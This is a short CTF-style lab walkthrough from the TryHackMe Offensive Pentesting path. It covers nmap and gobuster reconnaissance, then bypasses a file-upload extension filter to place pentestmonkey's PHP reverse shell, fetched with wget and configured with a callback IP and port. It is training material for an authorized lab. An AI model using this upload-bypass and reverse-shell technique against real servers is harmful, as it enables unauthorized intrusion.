TryHackMe Offensive Pentesting Path

August 16, 2022

    Reconnaissance :artificial_satellite:
    • Scan Target:
      • $ nmap -sV 0.0.0.0
        -sV: Probe open ports to determine service/version info
        -0.0.0.0: IP address of target

      • PORT STATE SERVICE VERSION
        3333/tcp open http Apache httpd 2.4.18 ((ubuntu))
    • Discover Directories
      • $ gobuster dir -u http://0.0.0.0:3333 -w /usr/share/wordlists/dirb/common.txt
        -u: Target URL
        -w: Wordlist

      • DIRECTORY STATUS
        /internal 301
    • Visit URL
      • Target URL Port 3333
    Compromise Webserver
    • Create and attempt to upload file with .php extension
      • Upload shell.php
    • Create custom extension-list to test what file extensions can be uploaded
      • $ cat phpext.txt
        .php
        .php3
        .php4
        .php5
        .phtml
    • Use Burp Suite to enumerate through extensions and find out which ones are allowed

    • Get PHP Reverse Shell from pentestmonkey
      • $ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

        Modify 'ip' and 'port' variables to your host machine's IP and netcat port you will use, respectively
        $ip = '127.0.0.1'; // CHANGE THIS
        $port = 1234; // CHANGE THIS
    • Rename reverse shell file extension to allowed extension
      • $ mv php-reverse-shell.php php-reverse-shell.phtml